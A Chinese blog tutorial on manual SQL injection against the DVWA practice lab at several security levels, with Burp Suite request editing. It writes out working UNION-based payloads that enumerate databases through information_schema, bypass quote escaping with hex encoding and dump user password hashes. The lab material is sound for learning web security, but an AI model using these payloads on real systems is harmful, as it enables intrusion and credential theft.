DVWA下的SQL注入

最新推荐文章于 2025-01-23 17:19:51 发布
原创 最新推荐文章于 2025-01-23 17:19:51 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#virtualbox #xampp #sql注入

部署运行你感兴趣的模型镜像
DVWA下的SQL注入
1 Low级别


(1)判断是否存在注入,注入是字符型还是数字型
首先,我们输入1测试一下:


然后输入一个2-1,如果结果和输入1的结果一样,则是数字型;如果结果不一样,则是字符型。


【注】输入1’and ‘1’ =’1时,查询语句中id后面的都为真,显示的只有一组;输入1’or ‘1 ’=’1时,查询语句中where后面都为真,显示所有的组。




(2)查询字段数
方法1:用order by语句
1’order by 1#:(#注释符,注释掉后面的内容)
2’order by 2#
3’order by 3#
如果3报错,则是2个字段






方法2:用union select语句
输入1’union select 1,2#




当输入1'union select 1,2,3#时,会出现错误。
(3)获取数据库名和用户名
1’union select database(),user()#




有时候,后面的select语句会限制输出的行数,一般会让原数据库查询无效,也就是输入无效的id,使得原数据库查询不返回结果,则要使用如下操作:
-1’union select database(),user()#:只会返回我们需要的数据
-1’ union select version(),@@version_compile_os#:获取当前数据库版本和操作系统。
[注]:id=-1这个-1表示执行时,前面是无效代码,只执行后面select database(),user()
(4)获取数据库中的表
在information_schema里,有一个表是tables(存放数据库中所有表的信息),另一个是columns。tables中有个字段叫table_name(表名),有一个叫table_schema(表示这个表所在的数据库);columns中有table_schema,column_name,table_name。
-1’union select table_name,2 from information_schema.tables where table_schema=’dvwa’#
[注]:-1是无效代码,不执行,执行后面的语句,union要前后两个字段数相同,因为之前测出来是2个字段,所以union后面也必须两个字段。


爆出来两个表,选users这个继续进行
-1’ union select column_name,2 from information_schema.columns where table_schema=’dvwa’ and table_name=’users’#


继续对user和password进行注入:
-1’ union select user,password from users#


密码是MD5的,需要解密


2 Medium级别






使用虚拟机的的ip
http://虚拟机ip/DVWA-master/login.php
相同的用户名(admin)和密码(password)登陆。
这次使用burpsuite抓包工具




点击next-Options-Proxy Listeners-Add-Binding,输入如下:


然后打开如下:


修改浏览器的代理配置:Preferences-Advanced-Network-Connection-Settings,改为如下:


点击浏览器中的Submit:


在burp suite中抓到的包如下:


可以修改最后一行,id的内容。


(1)id修改为2-1修改完后Forward,就执行了,然后浏览器就变为


说明是数字型的。
(2)id修改为1 order by 1#  
1 order by 2#
1 order by 3# 3是报错的




或者抓包改id:1 union select 1,2#


(3)抓包改id获取数据库名和用户名:
1 union select database(),user() #


(4)抓包改id获取数据库中的表:
-1 union select table_name,2 from information_schema.tables where table_schema=’dvwa’#
这个输入到id时会出错,显示单引号出问题,因为单引号被转义了,所以要写成下面:
-1union select table_name,2 from information_schema.tables where table_schema=database()#


因为单引号转义,所以要把users改为16进制的0×7573657273
-1 union select column_name,2 from information_schema.columns where table_name=0x7573657273#


【注】:如何改为16进制呢?
继续使用burp suite工具: 打开后选择Decoder




(5)对user,password进行注入
-1 union select user,password from users#


3 High级别


High级别在SQL查询语句中添加了LIMIT 1,希望可以控制只输出一个结果。
High级别注入时和Low一样,只是给语句后面加上#,将其注释掉。
例如:1#




4 Impossible级别

































 

您可能感兴趣的与本文相关的镜像

GPT-oss:20b

GPT-oss:20b

图文对话
Gpt-oss

GPT OSS 是OpenAI 推出的重量级开放模型,面向强推理、智能体任务以及多样化开发场景

DVWA——SQL注入
m0_74426634的博客
04-07 1654
日前,国内最大的程序员社区优快云网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
DVWA-SQL注入
qq_60848021的博客
06-25 1354
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
[网络安全]DVWASQL注入—High level解题简析 [网络安全]DVWASQL注入—High level解
2401_88752464的博客
01-05 486
由以上两个回显可知,该注入类型为字符型注入。由以上两个回显可知,注入点个数为两个。
DVWA靶场SQL注入
Tangyoo的博客
07-03 1697
SQL注入是指攻击者通过在Web表单输入字段、URL参数、HTTP头部等位置插入恶意的SQL代码,从而欺骗服务器执行非法的数据库操作。
SQL注入DVWA靶场SQL注入实践
weixin_40433003的博客
01-23 1588
接下来,对于数据库5.0以上的版本,存在information_schema表,这张数据表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表等信息;如上图所示,可以看到我们获得了关键字段:user和password,因此我们接着使用如下语句进行注入。(3)确定回显位置为第二个位置(查询结果显示在原始查询返回的第二列的位置)firefox自带插件,但是遇到收费版本,需要引入一个文件(进行过滤,即攻击者可以对数据库进行操作。当输入1,回显正常,确认存在sql注入。,返回错误,说明页面没有对。
DVWASQL 注入
Hacker_feng的博客
10-02 856
1' or 1=2 union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()# // 查询当前数据库dvwa 中的表。这里也可以通过输入union select 1,2,3…输入:1' union select 1,2#输入: 1' or '1'='1。
dvwa——sql注入
GZY0601的博客
09-16 807
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
DVWASQL Injection
谢公子的博客
08-05 7409
SQL Injection SQL Injection,即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。近期很火的大使馆接连被黑事件,据说黑客依靠的就是常见的SQL注入漏洞。 手工注入思路 自动化的注入神器sqlmap...
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 2214
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点
DVWA-----SQL Injection(SQL手工注入
m0_65712192的博客
11-21 1万+
DVWA-----SQL Injection(SQL手工注入
DVWASQL注入
leo788的博客
07-26 433
使用sqlmap在dvwa上进行简单的sql注入实验
dvwasql注入
BAIXUAN9527的博客
03-27 622
SQL i 攻击者在web表单或者页面请求的查询字符串中通过查询的字符串恶意的注入SQl命令,从而使数据库执行恶意的SQl语句 1验证web存在SQL漏洞 2寻找注入点 2.1web页面某个表单的输入框里 2.2web页面的URL查询(带参数的URl) 3构造攻击的SQL语句 4通过注入点提交构造的攻击语句,构造的SQL在数据库执行 5通过web页面返回数据,提取分析我们想要的数据信息 注入点类...
dvwa靶场SQL注入
最新发布
03-30
### 关于 DVWASQL 注入漏洞的测试与利用 DVWA(Damn Vulnerable Web Application)是一个用于教育目的的 PHP/MySQL 应用程序,旨在提供各种级别的安全性来帮助用户了解常见的 Web 漏洞及其利用方式。其中,SQL ...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值